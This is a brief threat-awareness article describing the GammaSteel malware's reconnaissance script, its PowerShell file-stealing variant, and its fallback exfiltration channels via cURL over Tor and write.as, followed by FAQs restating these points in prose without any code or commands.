GammaSteel Malware: A Threat to Computer Security

Reconnaissance Script

One of the scripts served as a reconnaissance tool, collecting information about the computer, including:

• System information
• Name of security software running
• Available space on disks
• Directory tree of the Desktop folder
• List of all running processes

All this collected information was sent back to the C2 server.

New GammaSteel Variant

PowerShell Script

The second script was a PowerShell version of GammaSteel that exfiltrated all files with certain extensions from specified directories, including:

• Desktop
• Download
• Documents

The targeted extensions included:

• .doc
• .docx
• .xls
• .xlsx
• .ppt
• .pptx
• .vsd
• .vsdx
• .rtf
• .odt
• .txt
• .pdf

Data Exfiltration Methods

The new GammaSteel version uses PowerShell web requests to exfiltrate files, and if it fails, it:

• Falls back to using the cURL command line tool with a Tor proxy to send data out
• May use the web service write.as as a fallback data exfiltration channel

Conclusion

The GammaSteel malware is a sophisticated threat that uses multiple scripts to compromise computer security. Its reconnaissance capabilities allow it to collect sensitive information, while its data exfiltration methods enable it to steal sensitive files. It is essential for computer users to be aware of these threats and take necessary precautions to protect their systems.

FAQs

• What is GammaSteel malware? GammaSteel is a type of malware that uses multiple scripts to compromise computer security.
• What does the reconnaissance script do? The reconnaissance script collects information about the computer, including system information, security software running, available space on disks, the directory tree of the Desktop folder, and a list of all running processes.
• What is the purpose of the PowerShell script? The PowerShell script exfiltrates files with certain extensions from specified directories.
• What are the targeted file extensions? The targeted file extensions include .doc, .docx, .xls, .xlsx, .ppt, .pptx, .vsd, .vsdx, .rtf, .odt, .txt, and .pdf.
• How does GammaSteel exfiltrate data? GammaSteel uses PowerShell web requests and cURL command line tool with a Tor proxy to exfiltrate data, and may use the web service write.as as a fallback data exfiltration channel.